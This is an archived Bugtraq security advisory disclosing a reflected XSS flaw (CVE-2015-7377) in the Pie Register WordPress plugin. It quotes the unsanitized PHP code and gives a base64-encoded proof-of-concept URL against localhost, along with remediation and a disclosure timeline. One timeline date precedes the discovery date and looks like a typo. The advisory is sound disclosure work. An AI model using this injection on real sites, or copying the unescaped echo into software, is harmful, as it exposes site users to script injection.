lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-Id: <201510121838.t9CIcTeB001278@sf01web2.securityfocus.com> Date: Mon, 12 Oct 2015 18:38:29 GMT From: grajalerts@...il.com To: bugtraq@...urityfocus.com Subject: CVE-2015-7377: Unauthenticated Reflected XSS in Pie Register WordPress Plugin Details ================ Software: Pie Register Version: 2.0.18 Homepage: https://github.com/GTSolutions/Pie-Register CVE: CVE-2015-7377 (Pending) CVSS: 4.3 (Medium; AV:N/AC:M/Au:N/C:N/I:P/A:N) CWE: CWE-79 Description ================ An unauthenticated reflected XSS vulnerability in Pie Register 2.0.18 allows malicious script injection via the invitaion_code parameter. Pie Register is a WordPress plugin with over 10,000 active installs. Vulnerability ================ The vulnerability is due to the unsanitized GET parameter invitaion_code: From: pie-register/pie-register.php: 647: $inv_code = base64_decode($_GET['invitaion_code']); . . . 662: <h2><?php _e("Activation Code","piereg");echo " : ".$inv_code; ?></h2> Proof of concept ================ The payload is Base64 encoded. http://localhost/wordpress/?page=pie-register&show_dash_widget=1&invitaion_code=PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg== Tested on Firefox 41.0 and Chrome 45.0.2454.85. Remediation ================ Upgrade the plugin to version 2.0.19. Timeline ================ 2015-09-23: Discovered 2015-09-24: Contacted vendor via website support form 2015-08-24: Requested CVE 2015-09-28: Vendor supplied security contact email 2015-09-30: Report sent to vendor and wordpress.org 2015-10-02: Vendor releases version 2.0.19 on Github - confirmed fixed 2015-10-12: Public Disclosure References ================ [1] http://codex.wordpress.org/Data_Validation Discovered by ================ David Moore @grajagandev
Powered by blists - more mailing lists